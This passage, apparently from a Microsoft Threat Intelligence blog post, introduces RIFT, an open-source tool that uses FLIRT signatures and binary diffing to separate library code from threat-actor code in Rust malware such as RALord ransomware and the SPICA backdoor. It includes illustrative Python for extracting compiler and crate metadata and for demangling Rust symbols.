They determine that their project should communicate via HTTP and incorporate a third-party dependency. They run cargo add request to install the latest version of the third-party library, request.
Following these steps will result in a fully configured project. Upon completion, the developer may run cargo build to finalize the binary, compiling the project.
Static artifacts and where to find them
Reverse engineers are usually handed the final development product of the malware author, oftentimes without information such as the compiler used or third-party dependencies. While it is highly likely that malware authors use the same tools as reverse engineers for development, no insights into the exact environment are available.
However, understanding the development toolchain can assist in quickly distinguishing library code from author-written logic. Fortunately, various indicators can be extracted that provide insights.
Rust compiler version
Rust binaries typically include metadata from the compiler that identifies the Rust version used to compile the binary. A config.toml file is provided alongside pre-compiled Rust compilers and toolchains. This configuration file contains the commit hash and the corresponding Rust compiler version of the pre-compiled product. By extracting the commit hash from the final binary output, it is possible to map the Git commit hash back to the appropriate Rust compiler version by parsing all available config.toml files from the official release channels.
Rust crates
As mentioned above, cargo is used to add dependencies to a project. Next to the Git commit hash, the metadata extracted from Rust binaries also includes the statically linked dependencies and their versions.
Figure 4. Extractable dependencies from strings
The above image shows how filtering for certain strings can display which dependencies were likely statically linked into RALord ransomware.
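As an added illustration of the two extraction steps above (the compiler commit hash and the crate names and versions), and not RIFT’s own code: a Python scan over the source-path strings that usually survive in a release Rust binary, on both Windows and Unix path styles. The string patterns, the sample bytes and the commit-to-version table are constructed assumptions; building the real table from the release channels’ config.toml files is left to the caller.

```python
import re
from collections import Counter
from typing import Dict, Optional

# Source-path strings that typically survive in release Rust binaries (panic
# locations keep them): "/rustc/<40-hex commit>/library/..." for the standard
# library and "cargo/registry/src/<index>/<crate>-<version>/..." for crates.
# Both separators are accepted because Windows builds embed backslash paths.
RUSTC_PATH_RE = re.compile(rb"[\\/]rustc[\\/]([0-9a-f]{40})[\\/]library[\\/]")
CRATE_PATH_RE = re.compile(
    rb"cargo[\\/]registry[\\/]src[\\/][^\\/\x00]+[\\/]"
    rb"([A-Za-z0-9_-]+?)-(\d+\.\d+\.\d+(?:-[0-9A-Za-z.]+)?)[\\/]"
)


def extract_rust_metadata(data: bytes) -> Dict[str, object]:
    """Return the rustc commit hash and statically linked crates seen in a binary's bytes."""
    commits = Counter(m.group(1).decode() for m in RUSTC_PATH_RE.finditer(data))
    deps: Dict[str, set] = {}
    for m in CRATE_PATH_RE.finditer(data):
        name, version = m.group(1).decode(), m.group(2).decode()
        deps.setdefault(name, set()).add(version)
    return {
        # The most frequent hash wins; a lone stray match is more likely a string literal.
        "rustc_commit": commits.most_common(1)[0][0] if commits else None,
        "dependencies": {name: sorted(v) for name, v in sorted(deps.items())},
    }


def resolve_rustc_version(commit: Optional[str], manifests: Dict[str, str]) -> Optional[str]:
    """Map a commit hash to a release version via a {commit: version} table.

    The table is what you build by parsing the config.toml files shipped with
    the release channels; that parsing is not reproduced here.
    """
    if commit is None:
        return None
    return manifests.get(commit.lower())


# Constructed sample: string fragments as they would appear in a stripped PE,
# with two rustc paths (same hash) and three crate paths in mixed path styles.
SAMPLE_BINARY = (
    b"\x00/rustc/9fc6b43126469e3858e2fe86cafb4f0fd5068869/library/core/src/fmt/mod.rs\x00"
    b"/rustc/9fc6b43126469e3858e2fe86cafb4f0fd5068869/library/alloc/src/raw_vec.rs\x00"
    b"C:\\Users\\dev\\.cargo\\registry\\src\\index.crates.io-6f17d22bba15001f\\"
    b"reqwest-0.11.27\\src\\lib.rs\x00"
    b"C:\\Users\\dev\\.cargo\\registry\\src\\index.crates.io-6f17d22bba15001f\\"
    b"tokio-util-0.7.10\\src\\codec\\mod.rs\x00"
    b"/home/dev/.cargo/registry/src/index.crates.io-6f17d22bba15001f/serde-1.0.219/src/de/mod.rs\x00"
    b"unrelated string\x00"
)
# Constructed commit -> version table (placeholder for what config.toml parsing yields).
SAMPLE_MANIFESTS = {"9fc6b43126469e3858e2fe86cafb4f0fd5068869": "1.84.0"}

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_BINARY
    meta = extract_rust_metadata(data)
    print("rustc commit:", meta["rustc_commit"],
          "->", resolve_rustc_version(meta["rustc_commit"], SAMPLE_MANIFESTS))
    for crate, versions in meta["dependencies"].items():
        print(f"  {crate} {', '.join(versions)}")
```

Run it with a path to a Rust binary to scan a real file, or without arguments to scan the constructed sample.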
Introducing RIFT
RIFT is an open-source tool consisting of a set of IDA Pro (supporting versions >=9.0) plugins and Python scripts that aim to assist reverse engineers and other software analysts in annotating library code in Rust malware. It essentially consists of three components:
RIFT Static Analyzer: IDA Pro plugin to extract the Rust compiler commit hash and embedded dependencies from a binary.
RIFT Generator: A Python program to automate the process of Rust compiler identification, FLIRT signature generation of used Rust compiler and dependencies, as well as automation of binary diffing.
RIFT Diff Applier: IDA Pro plugin to consume binary diffing information generated by RIFT Generator.
Extracting static information with RIFT Static Analyzer
In the previous section, we listed which indicators can be extracted from Rust binaries that give insights into which Rust compiler and dependencies were used. RIFT Static Analyzer automates the extraction process and stores the information in a JSON file for further processing. Furthermore, the plugin also extracts the architecture the binary was compiled for and the target operating system. In the below image, the target operating system is labeled as target_triple.
Figure 5. Overview of RIFT Static Analyzer
RIFT Generator: Automating FLIRT signature generation and auto diffing
Information gathered and stored by RIFT Static Analyzer can then be further processed by RIFT Generator.
Figure 6. RIFT Generator command line options
The Python program automates the process of compilation, data collection, FLIRT signature generation, and binary comparison.
It is essentially a wrapper around the following tools:
Cargo (Rust package manager) to manage the downloading and compiling of dependencies
Hex-Rays’ FLAIR tools, specifically sigmake.exe and pcf.exe, to generate FLIRT signatures
Hex-Rays’ text-interface version of IDA, idat.exe, to automate binary analysis and disassembly
The open-source tool Diaphora to facilitate binary diffing
Figure 7. Phases of RIFT Generator
The above image provides an overview of the phases RIFT Generator processes through. RIFT Generator reads the JSON file produced by RIFT Static Analyzer and downloads the corresponding Rust compiler, as well as the dependencies.
It is worth noting that upon completion of phase 1, both the code of the downloaded compiler and compiled crates are compressed as COFF files into RLIB files. RLIB is essentially a Rust-specific archive format similar to TAR. Once decompressed in phase 2, the COFF files are extracted and further processed.
FLIRT signatures and binary diffing
To provide information necessary for annotating library code in Rust binaries accurately, RIFT uses two known techniques for pattern matching: FLIRT signatures and binary diffing.
FLIRT stands for Fast Library Identification and Recognition Technology and enables IDA to identify standard library functions produced by its supported compilers. A characteristic of this technology is that library recognition is very precise. Therefore, functions that have a high similarity may not be flagged by FLIRT signatures due to their strict criteria.
Additionally, RIFT automates the process of binary diffing the collected COFF files against the target binary by leveraging IDA’s command line utility (idat.exe) and the Diaphora plugin.
Figure 8. Overview of experimental batch binary diffing process
In general, both approaches have their own advantages and disadvantages, which are listed below.
Binary diffing: Higher false positive rate, but less strict and can fill gaps where FLIRT signatures fail due to strictness
FLIRT signatures: With RIFT, in the majority of cases, FLIRT signatures can be generated quickly
Binary diffing: In its current state, the batch binary diffing approach might take multiple hours
FLIRT signatures: Not well applicable if dependencies and Rust compiler version are not available
Binary diffing: The approach might yield useful results even if the Rust compiler version and dependencies were not available
Consuming binary diffing information
If the binary diffing approach is applied, a second IDA plugin called RIFT Diff Applier can be used to apply the diffing results. In contrast to FLIRT signatures, the RIFT Diff Applier offers analysts an interactive, semi-manual method for identifying library code. It operates in two modes:
Interactive mode
Auto rename mode
Figure 9. GUI of RIFT Diff Applier
By default, symbol names in COFF files are mangled. Consequently, if RIFT Generator generates the binary diffing information and stores it in JSON format, the symbol names in that output are mangled as well. To address this, the Name Demangling option attempts to demangle these names. We are continuously improving the tool; currently, rust-demangler is used for this purpose.
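RIFT relies on rust-demangler for this step; as an added illustration of what demangling does (example code, not part of RIFT), the following Python decodes Rust’s legacy `_ZN…E` mangling scheme: length-prefixed path segments, `$`-escapes for punctuation, `..` for `::`, and a trailing 16-hex-digit `h…` hash that is dropped. The newer v0 `_R…` scheme is not handled (the function returns None), and the sample symbols below are constructed.

```python
import re
from typing import Optional

# Legacy-scheme escapes (subset that covers common symbols).
_ESCAPES = {"$SP$": "@", "$BP$": "*", "$RF$": "&", "$LT$": "<", "$GT$": ">",
            "$LP$": "(", "$RP$": ")", "$C$": ","}
_UNICODE = re.compile(r"\$u([0-9a-fA-F]+)\$")   # $u20$ -> ' ', $u7b$ -> '{'
_HASH = re.compile(r"h[0-9a-f]{16}")             # disambiguating hash segment


def _unescape(ident: str) -> str:
    """Turn one mangled path segment back into source-like text."""
    if ident.startswith("_$"):        # rustc prefixes '_' when a segment starts with '$'
        ident = ident[1:]
    for esc, ch in _ESCAPES.items():
        ident = ident.replace(esc, ch)
    ident = _UNICODE.sub(lambda m: chr(int(m.group(1), 16)), ident)
    return ident.replace("..", "::")


def demangle_legacy(sym: str, keep_hash: bool = False) -> Optional[str]:
    """Demangle a legacy Rust symbol (_ZN<len><ident>...E); None if not legacy/valid."""
    if not sym.startswith("_ZN"):
        return None                   # v0 (_R...) or non-Rust symbol
    i, parts = 3, []
    while i < len(sym) and sym[i] != "E":
        j = i
        while j < len(sym) and sym[j].isdigit():
            j += 1
        if j == i:                    # segment must begin with a decimal length
            return None
        n = int(sym[i:j])
        ident = sym[j:j + n]
        if len(ident) != n:           # truncated segment
            return None
        parts.append(ident)
        i = j + n
    if i >= len(sym) or not parts:    # missing terminating 'E'
        return None
    if not keep_hash and len(parts) > 1 and _HASH.fullmatch(parts[-1]):
        parts.pop()
    return "::".join(_unescape(p) for p in parts)
```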
For both modes, a minimum similarity ratio can be specified. Functions will only be displayed or renamed if they meet or exceed the specified similarity threshold. Once the user clicks “OK”, a new window titled RIFT will appear in IDA. Users can then right-click a function name (or use the CTRL+X shortcut) to display the top three matching functions with the highest similarity as determined through binary diffing.
Figure 10. RIFT window in IDA displaying top matching functions
Applying RIFT on RALord ransomware
Having introduced the functionalities of RIFT, we will now examine its practical application in analyzing RALord ransomware and how RIFT’s FLIRT signature generation can be used to greatly reduce the time spent identifying library functions in RALord.
First, RIFT Static Analyzer is used to dump the extractable dependencies, Git commit hash of the Rust compiler, target architecture, and target operating system. Next, the information is fed into RIFT Generator.
Once RIFT Generator has finished generating FLIRT signatures, they can be loaded either one by one manually or with our script named “ida_apply_flirt_from_folder.py”, shared in the RIFT GitHub repository.
The image below compares parts of the main function before and after application of RIFT. After applying the FLIRT signatures generated from the extracted dependencies and Rust compiler, the majority of library and compiler code is identified in the main function. As a result, reverse engineers can focus solely on the threat actor code instead of spending time weeding out the library code.
Figure 11. Comparing decompiled code before and after applying generated FLIRT signatures
Applying RIFT on SPICA
In some use cases, FLIRT signature application might not be enough, for example when conducting a deep dive. RIFT’s binary diffing approach can provide additional information to improve library code recognition in addition to FLIRT signatures.
Having demonstrated the effectiveness of RIFT in applying FLIRT signatures to streamline the analysis of RALord ransomware, we now turn our focus to applying the binary diffing approach on SPICA, a backdoor written in Rust. This transition highlights scenarios where FLIRT signatures alone might be insufficient, necessitating a deeper, complementary analysis.
Similar to before, RIFT Static Analyzer is used first and the extracted information is fed into RIFT Generator. However, this time we enable both FLIRT signature generation and binary diffing.
Figure 12. Enabling FLIRT signature generation and binary diffing
To use the binary diffing approach, Diaphora must be used first to generate the corresponding SQLite file. It is worth noting that depending on the size of the binary and extracted dependencies, the binary diffing procedure can take multiple hours.
Once done, RIFT Diff Applier can be used to load the binary diffing output file.
Figure 13. RIFT Diff Applier in use
A benefit of this approach is that for certain functions where FLIRT signatures failed to properly label the library function due to their strictness, RIFT Diff Applier can provide useful and reliable information where the similarity is high. Furthermore, from a detection engineering perspective, the approach can also help identify or filter out potential library functions, especially when writing signatures on code segments, so that signatures are not accidentally anchored on shared library code.
Afterwords: Open sourcing RIFT
Rust’s strong performance, safety-focused design, cross-compilation support, and concurrency features have led to its increased adoption by threat actors for developing complex malware. This growing shift towards Rust represents yet another evolution in the threat landscape, enabling attackers to create malware that is more resistant to detection and analysis.
For malware analysts, this trend introduces a daunting set of challenges. Rust’s innovative features often result in binaries that are harder to decompile and analyze, making reverse engineering a time-intensive process. Analysts are frequently left grappling with unfamiliar patterns and library-heavy outputs, which further complicate their efforts to dissect malware and develop detection methods.
To address these challenges, we are proud to announce the open sourcing of RIFT. Designed to help accelerate Rust malware analysis by assisting reverse engineers to recognize library code in Rust malware through FLIRT signatures and binary diffing, RIFT further reinforces global efforts to equip security professionals with proper tools to defend against threats. By making RIFT freely available to the cybersecurity community, we aim to foster collaboration and innovation in combating the rise of Rust-based malware. We would like to extend a special thanks to the author of the Diaphora project for their invaluable contribution to the reverse engineering community.
Microsoft’s ongoing research and development efforts, including the creation of tools like RIFT, underscore our commitment to protecting customers and securing the cyber landscape. By enhancing the efficiency and accuracy of malware analysis, we aim to keep pace with evolving threats and ensure the safety of users worldwide. This research highlights the critical need for advanced security measures to safeguard against such increasingly sophisticated cyber threats.
Meet the experts behind Microsoft Threat Intelligence, Incident Response, and the Microsoft Security Response Center at our VIP Mixer at Black Hat 2025. Discover how our end-to-end platform can help you strengthen resilience and elevate your security posture.
To hear stories and insights from the Microsoft Threat Intelligence community about the latest changes in the broader threat landscape, listen to the Microsoft Threat Intelligence podcast.